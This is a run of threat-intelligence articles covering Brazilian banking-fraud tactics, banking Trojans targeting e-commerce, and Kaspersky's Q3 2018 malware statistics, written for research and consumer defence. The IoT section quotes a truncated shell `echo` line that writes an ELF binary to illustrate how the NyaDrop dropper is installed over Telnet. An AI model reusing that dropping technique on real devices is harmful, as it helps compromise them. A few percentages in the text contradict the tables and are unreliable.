The minimum wage in Brazil stands at 969 reals (around $258) per month, as reported by The Rio Times. Brazilian Institute of Geography and Statistics (IBGE) data from 2017 shows that “more than 50 million Brazilians, nearly 25 percent of the population, live below the poverty line, and have family incomes of R$387.07 per month.”

Many Brazilians have never had it easy when it comes to their socio-economic situations. Since necessity is the mother of invention, that reality is also what makes Brazilians quite creative in problem solving. In many cases, the main problem for everyday people in Brazil is the lack of financial resources to sustain themselves and their families. That’s where creative thinking comes into play — sometimes in good ways and, unfortunately, sometimes in the shape of financial cybercrime.

Remote Overlay Malware Is the Way to Go

Financial threats targeting online banking users in Brazil are a rather monotonous bunch. Most code is based on overlay malware and written in the Delphi programming language — code that is neither elaborate nor modular. Why spend a chunk of money buying or building state-of-the-art malware, wrapping it up in end-to-end encryption and enabling it to gain rootkit privileges on devices, when you only need simple malware to trick users into unwittingly giving up their credentials?

With evolving controls that curb attackers’ ability to use phished credentials, using malware is the preferred method in Brazil, offering a better return on investment for less effort. But how are everyday fraudsters operating the malware supply chain without much technical savvy? That’s where creative thinking and being local come into play. It is also why so many fraudsters in Brazil use very similar malware codes that do mostly the same things — namely, remote overlay.

As its name suggests, remote overlay involves remotely plastering fake images and application interfaces on users’ screens to limit their access to an authenticated online banking session and trick them into divulging additional information. This type of malware is by far the most common used in Brazil nowadays, and threat actors have little reason to change it.

Brazilian Fraudsters Don’t Complicate Things When Easy Does It

Using malware is one thing, but first, it has to reach unsuspecting users. Without technical know-how, most Brazilian fraudsters do not operate exploit kits, which can be costly and often require technical support from cybercrime vendors. Recent attacks that our team analyzed show that most attackers prefer victims to come to them by putting a consumer spin on the watering hole attack tactic.

In Brazil, residents can download their monthly invoices and tax bills from the corresponding vendor’s website or government site. It is common practice for people to log in to an online utility account, for example, and download their bill. By setting up a malicious replica of such a site, criminals can attract a large number of users to that page and trick them into downloading a fake bill, thereby having them willingly fetch a Trojanized file and unknowingly launch the malware infection on their devices.

But without using an exploit kit or relying on high-traffic sites, how will that malicious infection zone become known to potential victims? Knowing that many people in Brazil are in the habit of searching for websites via search engines rather than typing their exact URL into the address bar, the obvious choice is to pay for a sponsored advertisement to have the malicious page top the search results. To keep their own identities out of sight, cybercriminals pay for sponsored ads with stolen credit card information, saving themselves both money and risk.

Posting malicious ads on popular search engines is no stroke of genius, but a surefire way to get those ads discovered by security controls and promptly taken down. Fraudsters using this tactic therefore rely on short, aggressive bouts of luring people to their phishing pages. Since they do not pay for the ads and can spin up a malicious page very quickly, they can still get enough clicks to make each attack worthwhile.

To further protect their malicious site for a long enough period to trap as many users as possible, fraudsters often use stolen payment cards to pay for legitimate services that optimize their site’s performance and mitigate the risk of a distributed denial-of-service (DDoS) attack.

Phising site in Brazil uses DDoS protection

Figure 2: Phishing site data on Virus Total

Malicious website public data

Figure 3: Phishing site uses DDoS protection

IBM X-Force noted that recent campaigns that spread malware using sponsored URLs were carefully targeted by focusing on a specific region on specific days. For example, these campaigns often impersonate a state’s power company around the due date of that month’s bill, exploiting the timely context for visitors trying to pay their invoice to infect victims with remote overlay Trojans.

As users attempt to download their invoices, they are actually accessing a ZIP file containing a shortcut file (.LNK) used by Microsoft Windows to point to an executable file. That file will then download additional malware components to infect the user’s device. Victims would only see a file that opens to nothing and may attempt to download the file again, which our researchers witnessed in many cases.

Need Help With Your Attack Campaign?

When it comes to financial cybercrime, technical sophistication, while not entirely absent, is not very common in the Brazilian threat landscape. In many cases, cybercriminals in the region are newcomers to the trade and need help to become familiar with the works of online fraud.

To fill in the gaps, these newcomers receive assistance from other criminals in the shape of tutorials, lessons, tools and wares to help them along — a marketplace that’s comparable to other dark web and underground forums across the globe.

In the images below, we can see that selling information and tools is a dynamic business in Brazil. Each of the following screen captures shows commodities offered to fraudsters, including compromised data, web resources and platforms to launch attacks, blackhat lead generation help, and cash-out services. The same types of vendors also offer malware for sale.

Brazil fraudster underground Brazilian fraudster service Brazilian fraud services Brazil fraud services

Figure 4: Cybercriminals often offer services and commodities to help other criminals along.

Dark web marketplaces spread knowledge and train more criminals on fraud tactics. Localized cybercrime ecosystems are more targeted, which boosts their efficiency and adverse effects.

A Word to the Wise: Top Tips for Safer Web Browsing

While it is easy for Brazilian users to get infected with malware, infections cannot occur without user interaction. This is in contrast to other parts of the world, where people can often get infected simply by visiting a compromised page through a drive-by download from an exploit kit, for example.

Below are some consumer tips for safer browsing, adapted to the popular infection scenarios in Brazil:

  • Don’t search for the homepage of important accounts. Poisoned search engine results can easily lead users to a malicious page. For important accounts, especially those involving payments, type the URL into the address bar or save the genuine website in the browser’s favorites list and access it from there.
  • Double-check the site before downloading files. Before clicking to download an invoice, double-check the domain and its credentials — a malicious site might be written with a spelling mistake or use a different top-level domain (TLD).
  • Make sure the site is secure. Since the update to Hypertext Transfer Protocol Secure (HTTPS), all websites feature encryption. Look for a lock icon in the address bar and click it to see that you are in the right place. Most popular web browsers will alert users to a site that is not secured, or worse, dangerous to visit. If that’s the case, close the page and contact the service provider directly to pay a bill.
  • Get genuine security software for your devices. Even though regular antivirus software can take longer to detect new banking malware, it can offer some protection against known threats, which are what hits users most often. Use and update an antivirus program on your home and mobile devices.
  • Keep your operating system (OS) and all applications up to date. Cybercriminals can take advantage of bugs and flaws in unpatched systems to compromise or infect them with malware. Apply patches and updates as soon as they become available to limit vulnerability.
  • Stay away from counterfeit software. All major software vendors have one, if not many, application security teams. Anyone offering up counterfeit software goes to great lengths to bypass the original vendor’s controls and, as a result, counterfeit applications are often weaker and open up backdoors to devices. Stay away from counterfeit applications and favor open source or freeware programs if you cannot afford to buy original software.
  • Last, but not least: education. One of the most important ways to help prevent malware infections and online banking fraud is user education. While security controls can help mitigate risks, they can’t replace user vigilance. Organizations and service providers alike should offer information that can help users become more aware of attack tactics and the risks associated with them.

Malware is prolific, but with the right risk management solution, you can prevent fraud while establishing digital identity trust throughout your customer’s online journey.

The post Easy Does It! A Timely Look Into Fraud TTPs in the Brazilian Financial Cybercrime Landscape appeared first on Security Intelligence.

Black Friday alert

Banking Trojans traditionally target users of online financial services; looking for financial data to steal or building botnets out of hacked devices for future attacks. However, over time, several of these banking Trojans have enhanced their functionality, launching new variants and extending their range. Some are now able to obtain root access to infected devices, perform transactions, inject other malicious code, record video, and more. And the victims of such malware are not just people who bank online but online shoppers in general.
According to Kaspersky Lab data, 14 malware families are targeting e-commerce brands to steal from victims. The main ones are Betabot, Panda, Gozi, Zeus, Chthonic, TinyNuke, Gootkit2, IcedID and SpyEye. They are all banking Trojans. Detections of their e-commerce-related activity has increased steadily over the last few years, from 6.6 million in 2015 to an estimated 12.3 million by the end of 2018 (based on the extrapolation of a detection number of 9.2 million at the end of Q3, 2018), with a 12% increase between 2016 and 2017, and a 10% expected rise between 2017 and 2018.

Overall detection data for main malware Trojans targeting users of e-commerce brands, 2015 – 2018. Source: KSN (download)

Attack method

The Trojans are using the e-commerce brands to hunt user credentials like login, password, card number, phone number, and more. In order to do so, the malware can intercept input data on target sites, modify online page content, and/or redirect visitors to phishing pages.
For example, the Trojans enable the cybercriminals behind them to monitor users’ online behavior: tracking which sites are visited on the infected device. If the Trojan spots the user browsing to a target e-commerce website, it activates its form-grabbing functionality. ‘Form grabbing’ is a technique used by criminals to save all the information that a user enters into forms on a website. And on an e-commerce website, such forms are almost certain to contain: login and password combination as well as payment data such as credit card number, expiration date and CVV. If there is no two-factor transaction confirmation in place, then the criminals who obtained this data can use it to steal money.

Target brands

The 14 malware families were found to be targeting a total of 67 consumer e-commerce sites between them. This includes 33 ‘consumer apparel’ sites (clothing, footwear, gifts, toys, jewelry and department stores), eight consumer electronics sites, eight entertainment and gaming sites, three popular telecoms sites, two online payment sites, and three online retail platforms, among others.
Betabot targets as many as 46 different brands, and was the only Trojan to target entertainment and gaming sites, while Gozi targets 36 brands overall, and Panda 35.

Proportion of e-commerce categories targeted by malware, 2018 (download)

Why would banking Trojans target e-commerce sites?

One possibility is financial gain by selling the credentials: our research uncovered over three million sets of e-commerce credentials up for sale on a marketplace easily accessible through the Google search engine. The highest prices are charged for what appear to be hacked merchant accounts.
Another way of making money could be to use rather than sell the compromised credentials. Cybercriminals could, for example, use the stolen accounts in money-laundering schemes: buying things from a website using victims’ credentials so they look like known customers and don’t trigger any anti-fraud measures, and then selling those items on again.

Target geography

In 2018, malware attacks to steal data through e-commerce brands were particularly active in European countries, including Italy, Germany and France, as well as in North America, Russia and emerging markets.
For example, most of those affected by Betabot attacks through e-commerce sites were located in Italy (where 14.13% of users affected by any malware in the first eight months of 2018 were targeted by this threat), Germany (6.04%), Russia (5.5%) and India (4.87%). For Gozi the pattern was similar: 19.57% of users affected by any malware in Italy were targeted by this threat, with Russia second (13.89%), followed by Brazil (11.96%) and France (5.91%).

Advice and recommendations

To stay safe from such threats during the busy festive shopping season, Kaspersky Lab recommends taking the following security measures:

If you are a consumer

  • A powerful, updated security solution is a must for all devices you use to shop online. Avoid buying anything online from websites that look potentially dangerous or resemble an incomplete version of a trusted brand’s website.
  • Don’t click on unknown links in email or social media messages, even from people you know, unless you were expecting the message.

If you are an online brand or trader

  • Use a reputable payment service and keep your online trading and payment platform software up to date. Every new update may contain critical patches to make the system less vulnerable to cybercriminals.
  • Use a tailored security solution to protect your business and customers.
  • Pay attention to the personal information used by customers to buy from you. Use a fraud prevention solution that you can adjust to your company profile and the profile of your customers.
  • Think about how much money you wish to keep in an online payment transaction account at any one time. The greater the balance, the higher the value of that account to hackers.
  • Restrict the number of attempted transactions and always use two-factor authentication (Verified by Visa, MasterCard Secure Code, etc.).

The research is based on data obtained with user consent and processed using Kaspersky Security Network (KSN). All malware belonging to the banking Trojans covered in the report are detected and blocked by Kaspersky Lab security solutions.

Full report “Buyer beware: cyberthreats targeting e-commerce, 2018” (English, PDF)

IT threat evolution Q3 2018. Statistics

These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data.

Q3 figures

According to Kaspersky Security Network:

  • Kaspersky Lab solutions blocked 947,027,517 attacks launched from online resources located in 203 countries.
  • 246,695,333 unique URLs were recognized as malicious by Web Anti-Virus components.
  • Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 305,315 users.
  • Ransomware attacks were registered on the computers of 259,867 unique users.
  • Our File Anti-Virus logged 239,177,356 unique malicious and potentially unwanted objects.
  • Kaspersky Lab products for mobile devices detected:
    • 1,305,015 malicious installation packages
    • 55,101 installation packages for mobile banking Trojans
    • 13,075 installation packages for mobile ransomware Trojans.

Mobile threats

Q3 events

Perhaps the biggest news of the reporting period was the Trojan-Banker.AndroidOS.Asacub epidemic. It peaked in September when more than 250,000 unique users were attacked – and that only includes statistics for those with Kaspersky Lab’s mobile products installed on their devices.

Number of users attacked by the mobile banker Asacub in 2017 and 2018

The scale of the attack involving Asacub by far surpasses the largest attacks we have previously observed while monitoring mobile threats. The Trojan’s versions have sequential version numbers, suggesting the attacks were launched by just one threat actor. It’s impossible to count the total number of affected users, but it would need to be in the tens of thousands to make such a massive malicious campaign profitable.

Mobile threat statistics

In Q3 2018, Kaspersky Lab detected 1,305,015 malicious installation packages, which is 439,229 more packages than in the previous quarter.

Number of detected malicious installation packages, Q3 2017 – Q3 2018 (download)

Distribution of detected mobile apps by type

Among all the threats detected in Q3 2018, the lion’s share belonged to potentially unwanted RiskTool apps (52.05%); compared to the previous quarter, their share decreased by 3.3 percentage points (p.p.). Members of the RiskTool.AndroidOS.SMSreg family contributed most to this.

Distribution of newly detected mobile apps by type, Q2 – Q3 2018 (download)

Second place was occupied by Trojan-Dropper threats (22.57%), whose share increased by 9 p.p. Most files of this type belonged to the Trojan-Dropper.AndroidOS.Piom, Trojan-Dropper.AndroidOS.Wapnor and Trojan-Dropper.AndroidOS.Hqwar families.

The share of advertising apps continued to decrease and accounted for 6.44% of all detected threats (compared to 8.91% in Q2 2018).

The statistics show that the number of mobile financial threats has been rising throughout 2018, with the proportion of mobile banker Trojans increasing from 1.5% in Q1, to 4.38% of all detected threats in Q3.

TOP 20 mobile malware

Verdicts* %**
1 DangerousObject.Multi.Generic 55.85
2 Trojan.AndroidOS.Boogr.gsh 11.39
3 Trojan-Banker.AndroidOS.Asacub.a 5.28
4 Trojan-Banker.AndroidOS.Asacub.snt 5.10
5 Trojan.AndroidOS.Piom.toe 3.23
6 Trojan.AndroidOS.Dvmap.a 3.12
7 Trojan.AndroidOS.Triada.dl 3.09
8 Trojan-Dropper.AndroidOS.Tiny.d 2.88
9 Trojan-Dropper.AndroidOS.Lezok.p 2.78
10 Trojan.AndroidOS.Agent.rt 2,74
11 Trojan-Banker.AndroidOS.Asacub.ci 2.62
12 Trojan-Banker.AndroidOS.Asacub.cg 2.51
13 Trojan-Banker.AndroidOS.Asacub.ce 2.29
14 Trojan-Dropper.AndroidOS.Agent.ii 1,77
15 Trojan-Dropper.AndroidOS.Hqwar.bb 1.75
16 Trojan.AndroidOS.Agent.pac 1.61
17 Trojan-Dropper.AndroidOS.Hqwar.ba 1.59
18 Exploit.AndroidOS.Lotoor.be 1.55
19 Trojan.AndroidOS.Piom.uwp 1.48
20 Trojan.AndroidOS.Piom.udo 1.36

* This malware rating does not include potentially dangerous or unwanted programs such as RiskTool or adware.
** Unique users attacked by the given malware as a percentage of all users of Kaspersky Lab’s mobile antivirus that were attacked.

First place in our TOP 20 once again went to DangerousObject.Multi.Generic (55.85%), the verdict we use for malware that’s detected using cloud technologies. Cloud technologies work when antivirus databases do not yet contain the data to detect a malicious program but the company’s cloud antivirus database already includes information about the object. This is basically how the very latest malicious programs are detected.

In second place was Trojan.AndroidOS.Boogr.gsh (11.39%). This verdict is given to files that our system recognizes as malicious based on machine learning..

Third and fourth places went to representatives of the Asacub mobile banker family – Trojan-Banker.AndroidOS.Asacub.a (5.28%) and Trojan-Banker.AndroidOS.Asacub.snt (5.10%).

Geography of mobile threats

Map of attempted infections using mobile malware, Q3 2018 (download)

TOP 10 countries by share of users attacked by mobile malware:

Country* %**
1 Bangladesh 35.91
2 Nigeria 28.54
3 Iran 28.07
4 Tanzania 28.03
5 China 25.61
6 India 25.25
7 Pakistan 25.08
8 Indonesia 25.02
9 Philippines 23.07
10 Algeria 22.88

* Countries with relatively few users of Kaspersky Lab’s mobile antivirus (under 10,000) are excluded.
** Unique users attacked in the country as a percentage of all users of Kaspersky Lab’s mobile antivirus in the country.

In Q3 2018, Bangladesh (35.91%) retained first place in terms of the share of mobile users attacked. Nigeria (28.54%) came second. Third and fourth places were claimed by Iran (28.07%) and Tanzania (28.03%) respectively.

Mobile banking Trojans

During the reporting period, we detected 55,101 installation packages for mobile banking Trojans, which is nearly 6,000 fewer than in Q2 2018.

The largest contribution was made by Trojans belonging to the family Trojan-Banker.AndroidOS.Hqwar.jck – this verdict was given to 35% of all detected banking Trojans. Trojan-Banker.AndroidOS.Asacub came second, accounting for 29%.

Number of installation packages for mobile banking Trojans detected by Kaspersky Lab, Q3 2017 – Q3 2018 (download)

Verdicts %*
1 Trojan-Banker.AndroidOS.Asacub.a 33.27
2 Trojan-Banker.AndroidOS.Asacub.snt 32.16
3 Trojan-Banker.AndroidOS.Asacub.ci 16.51
4 Trojan-Banker.AndroidOS.Asacub.cg 15.84
5 Trojan-Banker.AndroidOS.Asacub.ce 14.46
6 Trojan-Banker.AndroidOS.Asacub.cd 6.66
7 Trojan-Banker.AndroidOS.Svpeng.q 3.25
8 Trojan-Banker.AndroidOS.Asacub.cf 2.07
9 Trojan-Banker.AndroidOS.Asacub.bz 1.68
10 Trojan-Banker.AndroidOS.Asacub.bw 1.68

* Unique users attacked by the given malware as a percentage of all users of Kaspersky Lab’s mobile antivirus that were attacked by banking threats.

In Q3 2018, the TOP 10 rating of banking threats was almost exclusively (nine places out of 10) occupied by various versions of Trojan-Banker.AndroidOS.Asacub.

Geography of mobile banking threats, Q3 2018 (download)

TOP 10 countries by share of users attacked by mobile banking Trojans:

Country* %**
1 Russia 2.18
2 South Africa 2.16
3 Malaysia 0.53
4 Ukraine 0.41
5 Australia 0.39
6 China 0.35
7 South Korea 0.33
8 Tajikistan 0.30
9 USA 0.27
10 Poland 0.25

* Countries where the number of users of Kaspersky Lab’s mobile antivirus is relatively small (under 10,000) are excluded.
** Unique users in the country attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky Lab’s mobile antivirus in the country.

In Q3 2018, Russia ended up in first place in this TOP 10 because of the mass attacks involving the Asacub Trojan. The USA, the previous quarter’s leader, fell to ninth (0.27%) in Q3. Second and third place were occupied by South Africa (2.16%) and Malaysia (0.53%) respectively.

Mobile ransomware Trojans

In Q3 2018, we detected 13,075 installation packages for mobile ransomware Trojans, which is 1,044 fewer than in Q2.

Number of installation packages for mobile ransomware Trojans detected by Kaspersky Lab, Q3 2017 – Q3 2018 (download)

Verdicts %*
1 Trojan-Ransom.AndroidOS.Svpeng.ag 47.79
2 Trojan-Ransom.AndroidOS.Svpeng.ah 26.55
3 Trojan-Ransom.AndroidOS.Zebt.a 6.71
4 Trojan-Ransom.AndroidOS.Fusob.h 6.23
5 Trojan-Ransom.AndroidOS.Rkor.g 5.50
6 Trojan-Ransom.AndroidOS.Svpeng.snt 3.38
7 Trojan-Ransom.AndroidOS.Svpeng.ab 2.15
8 Trojan-Ransom.AndroidOS.Egat.d 1.94
9 Trojan-Ransom.AndroidOS.Small.as 1.43
10 Trojan-Ransom.AndroidOS.Small.cj 1.23

* Unique users attacked by the given malware as a percentage of all users of Kaspersky Lab’s mobile antivirus attacked by ransomware Trojans.

In Q3 2018, the most widespread mobile ransomware Trojans belonged to the Svpeng family – Trojan-Ransom.AndroidOS.Svpeng.ag (47.79%) and Trojan-Ransom.AndroidOS.Svpeng.ah (26.55%). Together, they accounted for three quarters of all mobile ransomware Trojan attacks. The once-popular families Zebt and Fusob were a distant third and fourth, represented by Trojan-Ransom.AndroidOS.Zebt.a (6.71%) and Trojan-Ransom.AndroidOS.Fusob.h (6.23%) respectively.

Geography of mobile ransomware Trojans, Q3 2018 (download)

TOP 10 countries by share of users attacked by mobile ransomware Trojans:

Country* %**
1 USA 1.73
2 Kazakhstan 0.36
3 China 0.14
4 Italy 0.12
5 Iran 0.11
6 Belgium 0.10
7 Switzerland 0.09
8 Poland 0.09
9 Mexico 0.09
10 Romania 0.08

* Countries where the number of users of Kaspersky Lab’s mobile antivirus is relatively small (under 10,000) are excluded.
** Unique users in the country attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky Lab’s mobile antivirus in the country.

Just like in Q2, first place in the TOP 10 went to the United States (1.73%). Kazakhstan (0.6%) rose one place to second in Q3, while China (0.14%) rose from seventh to third.

Attacks on IoT devices

In this quarter’s report, we decided to only present the statistics for Telnet attacks, as this type of attack is used most frequently and employs the widest variety of malware types.

Telnet 99,4%
SSH 0,6%

The popularity of attacked services according to the number of unique IP addresses from which attacks were launched, Q3 2018

Telnet attacks

Geography of IP addresses of devices from which attacks were attempted on Kaspersky Lab honeypots, Q3 2018 (download)

TOP 10 countries hosting devices that were sources of attacks targeting Kaspersky Lab honeypots.

Country %*
1 China 27.15%
2 Brazil 10.57%
3 Russia 7.87%
4 Egypt 7.43%
5 USA 4.47%
6 South Korea 3.57%
7 India 2.59%
8 Taiwan 2.17%
9 Turkey 1.82%
10 Italy 1.75%

* Infected devices in each country as a percentage of the global number of IoT devices that attack via Telnet.

In Q3, China (23.15%) became the leader in terms of the number of unique IP addresses directing attacks against Kaspersky Lab honeypots. Brazil (10.57%) came second, after leading the rating in Q2. Russia (7.87%) was third.

Successful Telnet attacks saw the threat actors download Downloader.Linux.NyaDrop.b (62.24%) most often. This piece of malware is remarkable in that it contains a shell code that downloads other malware from the same source computer that has just infected the victim IoT device. The shell code doesn’t require any utilities – it performs all the necessary actions within itself using system calls. In other words, NyaDrop is a kind of universal soldier, capable of performing its tasks irrespective of the environment it has been launched in.

It was the Trojans of the family Backdoor.Linux.Hajime that downloaded NyaDrop most frequently, because this is a very convenient self-propagation method for Hajime. The flow chart in this case is of particular interest:

  1. After successfully infecting a device, Hajime scans the network to find new victims.
  2. As soon as a suitable device is found, the lightweight NyaDrop (just 480 bytes) is downloaded to it.
  3. NyaDrop contacts the device that was the infection source and slowly downloads Hajime, which is much larger.

All these actions are only required because it’s quite a challenge to download files via Telnet, though it is possible to execute commands. For example, this is what creating a NyaDrop file looks like:

echo -ne "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00

480 bytes can be sent this way, but sending 60 KB becomes problematic.

TOP 10 malware downloaded to infected IoT devices in successful Telnet attacks

Verdicts %*
1 Trojan-Downloader.Linux.NyaDrop.b 62.24%
2 Backdoor.Linux.Mirai.ba 16.31%
3 Backdoor.Linux.Mirai.b 12.01%
4 Trojan-Downloader.Shell.Agent.p 1.53%
5 Backdoor.Linux.Mirai.c 1.33%
6 Backdoor.Linux.Gafgyt.ay 1.15%
7 Backdoor.Linux.Mirai.au 0.83%
8 Backdoor.Linux.Gafgyt.bj 0.61%
9 Trojan-Downloader.Linux.Mirai.d 0.51%
10 Backdoor.Linux.Mirai.bj 0.37%

* Proportion of downloads of each specific malicious program to IoT devices in successful Telnet attacks as a percentage of all malware downloads in such attacks.

The rating did not differ much from the previous quarter: half the top 10 is occupied by different modifications of Mirai, which is the most widespread IoT malware program to date.

Financial threats

Q3 events

The banking Trojan DanaBot that was detected in Q2 continued to develop rapidly in Q3. A new modification included not only an updated C&C/bot communication protocol but also an extended list of organizations targeted by the malware. Its prime targets in Q2 were located in Australia and Poland, but in Q3 organizations from Austria, Germany and Italy were also included.

To recap, DanaBot has a modular structure and is capable of loading extra modules to intercept traffic and steal passwords and crypto wallets. The Trojan spread via spam messages containing a malicious office document, which subsequently loaded the Trojan’s main body.

Financial threat statistics

In Q3 2018, Kaspersky Lab solutions blocked attempts to launch one or more malicious programs designed to steal money from bank accounts on the computers of 305,315 users.

Number of unique users attacked by financial malware, Q3 2018 (download)

Geography of attacks

To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, we calculated the share of users of Kaspersky Lab products in each country that faced this threat during the reporting period out of all users of our products in that country.

Geography of banking malware attacks, Q3 2018 (download)

TOP 10 countries by percentage of attacked users

Country* %**
1 Germany 3.0
2 South Korea 2.8
3 Greece 2.3
4 Malaysia 2.1
5 Serbia 2.0
6 United Arab Emirates 1.9
7 Portugal 1.9
8 Lithuania 1.9
9 Indonesia 1.8
10 Cambodia 1.8

* Countries with relatively few users of Kaspersky Lab’s mobile antivirus (under 10,000) are excluded.
** Unique users attacked by mobile banking Trojans in the country as a percentage of all users of Kaspersky Lab’s mobile antivirus in that country.

TOP 10 banking malware families

Name Verdicts %*
1 Zbot Trojan.Win32.Zbot 25.8
2 Nymaim Trojan.Win32.Nymaim 18.4
3 SpyEye Backdoor.Win32.SpyEye 18.1
4 RTM Trojan-Banker.Win32.RTM 9.2
5 Emotet Backdoor.Win32.Emotet 5.9
6 Neurevt Trojan.Win32.Neurevt 4.7
7 Tinba Trojan-Banker.Win32.Tinba 2.8
8 NeutrinoPOS Trojan-Banker.Win32.NeutrinoPOS 2.4
9 Gozi Trojan.Win32. Gozi 1.6
10 Trickster Trojan.Win32.Trickster 1.4

* Unique users attacked by the given malware as a percentage of all users that were attacked by banking threats.

In Q3 2018, there were three newcomers to this TOP 10: Trojan.Win32.Trickster (1.4%), Trojan-Banker.Win32.Tinba (2.8%) and Trojan-Banker.Win32.RTM (9.2%). The latter shot to fourth place thanks to a mass mailing campaign in mid-July that involved emails with malicious attachments and links.

Overall, the TOP 3 remained the same, though Trojan.Win32.Nymaim ceded some ground – from 27% in Q2 to 18.4% in Q3 – and fell to second.

Cryptoware programs

Q3 events

In early July, Kaspersky Lab experts detected an unusual modification of the notorious Rakhni Trojan. What drew the analysts’ attention was that in some cases the downloader now delivers a miner instead of ransomware as was always the case with this malware family in the past.

August saw the detection of the rather unusual KeyPass ransomware. Its creators apparently decided to make provisions for all possible infection scenarios – via spam, with the help of exploit packs, and via manual brute-force attacks on the passwords of the remote access system, after which the Trojan is launched. The KeyPass Trojan can run in both hidden mode and GUI mode so the threat actor can configure encryption parameters.

Meanwhile, law enforcement agencies continue their systematic battle against ransomware. Following several years of investigations, two cybercriminals who distributed the CoinVault ransomware were found guilty in the Netherlands.

Statistics

Number of new modifications

In Q3, the number of detected cryptoware modifications was significantly lower than in Q2 and close to that of Q1.

Number of new cryptoware modifications, Q4 2017 – Q3 2018 (download)

Number of users attacked by Trojan cryptors

In Q3 2018, Kaspersky Lab products protected 259,867 unique KSN users from Trojan cryptors. The total number of attacked users rose both against Q2 and on a month-on-month basis during Q3. In September, we observed a significant rise in the number of attempted infections, which appears to correlate with people returning from seasonal vacations.

Number of unique users attacked by Trojan cryptors, Q3 2018 (download)

Geography of attacks

Geography of Trojan cryptors attacks, Q3 2018 (download)

TOP 10 countries attacked by Trojan cryptors

Country* %**
1 Bangladesh 5.80
2 Uzbekistan 3.77
3 Nepal 2.18
4 Pakistan 1.41
5 India 1.27
6 Indonesia 1.21
7 Vietnam 1.20
8 Mozambique 1.06
9 China 1.05
10 Kazakhstan 0.84

* Countries with relatively few Kaspersky Lab users (under 50,000) are excluded.
** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in that country.

Most of the places in this rating are occupied by Asian countries. Bangladesh tops the list with 5.8%, followed by Uzbekistan (3.77%) and the newcomer Nepal (2.18%) in third. Pakistan (1.41%) came fourth, while China (1.05%) fell from sixth to ninth and Vietnam (1.20%) fell four places to seventh.

TOP 10 most widespread cryptor families

Name Verdicts %*
1 WannaCry Trojan-Ransom.Win32.Wanna 28.72%
2 (generic verdict) Trojan-Ransom.Win32.Phny 13.70%
3 GandCrab Trojan-Ransom.Win32.GandCrypt 12.31%
4 Cryakl Trojan-Ransom.Win32.Cryakl 9.30%
5 (generic verdict) Trojan-Ransom.Win32.Gen 2.99%
6 (generic verdict) Trojan-Ransom.Win32.Cryptor 2.58%
7 PolyRansom/VirLock Virus.Win32.PolyRansom 2.33%
8 Shade Trojan-Ransom.Win32.Shade 1,99%
9 Crysis Trojan-Ransom.Win32.Crusis 1.70%
10 (generic verdict) Trojan-Ransom.Win32.Encoder 1.70%

* Unique Kaspersky Lab users attacked by a specific family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors.

The leading 10 places are increasingly occupied by generic verdicts, suggesting widespread cryptors are effectively detected by automatic intelligent systems. WannaCry (28.72%) still leads the way among specific cryptoware families. This quarter saw two new versions of the Trojan GandCrab (12.31%) emerge, meaning it remained in the most widespread ransomware rating. Among the old-timers that remained in the TOP 10 were PolyRansom, Cryakl, Shade, and Crysis, while Cerber and Purgen failed to gain much distribution this quarter.

Cryptominers

As we already reported in Ransomware and malicious cryptominers in 2016-2018, ransomware is gradually declining and being replaced with cryptocurrency miners. Therefore, this year we decided to start publishing quarterly reports on the status of this type of threat. At the same time, we began using a broader range of verdicts as a basis for collecting statistics on miners, so the statistics in this year’s quarterly reports may not be consistent with the data from our earlier publications.

Statistics

Number of new modifications

In Q3 2018, Kaspersky Lab solutions detected 31,991 new modifications of miners.

Number of new miner modifications, Q3 2018 (download)

Number of users attacked by cryptominers

In Q3, Kaspersky Lab products detected mining programs on the computers of 1,787,994 KSN users around the world.

Number of unique users attacked by cryptominers, Q3 2018 (download)

Cryptomining activity in September was comparable to that of June 2018, though we observed an overall downward trend in Q3.

Geography of attacks

Geography of cryptominers, Q3 2018 (download)

TOP 10 countries by percentage of attacked users

Country* %**
1 Afghanistan 16.85%
2 Uzbekistan 14.23%
3 Kazakhstan 10.17%
4 Belarus 9.73%
5 Vietnam 8.96%
6 Indonesia 8.80%
7 Mozambique 8.50%
8 Ukraine 7.60%
9 Tanzania 7.51%
10 Azerbaijan 7.13%

* Countries with relatively few Kaspersky Lab product users (under 50,000) are excluded.
** Unique Kaspersky Lab users whose computers were targeted by miners as a percentage of all unique users of Kaspersky Lab products in the country.

Vulnerable apps used by cybercriminals

The distribution of platforms most often targeted by exploits showed very little change from Q2. Microsoft Office applications (70%) are still the most frequently targeted – five times more than web browsers, the second most attacked platform.

Although quite some time has passed since security patches were released for the two vulnerabilities most often used in cyberattacks – CVE-2017-11882 and CVE-2018-0802 – the exploits targeting the Equation Editor component still remain the most popular for sending malicious spam messages.

An exploit targeting the vulnerability CVE-2018-8373 in the VBScript engine (which was patched in late August) was detected in the wild and affected Internet Explorer 9–11. However, we are currently observing only limited use of this vulnerability by cybercriminals. This is most probably due to Internet Explorer not being very popular, as well as the fact that VBScript execution is disabled by default in recent versions of Windows 10.

Distribution of exploits used by cybercriminals, by type of attacked application, Q3 2018 (download)

Q3 was also marked by the emergence of two atypical 0-day vulnerabilities – CVE-2018-8414 and CVE-2018-8440. They are peculiar because information about the existence of these vulnerabilities, along with detailed descriptions and all the files required to reproduce them, was leaked to the public domain long before official patches were released for them.

In the case of CVE-2018-8414, an article was published back in June with a detailed description of how SettingContent-ms files can be used to execute arbitrary code in Windows. However, the security patch to fix this vulnerability was only released in Q3, one month after the article became publicly available and active exploitation of the vulnerability had already began. The researchers who described this technique reported it to Microsoft, but initially it was not recognized as a vulnerability requiring a patch. Microsoft reconsidered after cybercriminals began actively using these files to deliver malicious payloads, and a patch was released on July 14. According to KSN statistics, the SettingContent-ms files didn’t gain much popularity among cybercriminals, and after the security patch was released, their use ceased altogether.

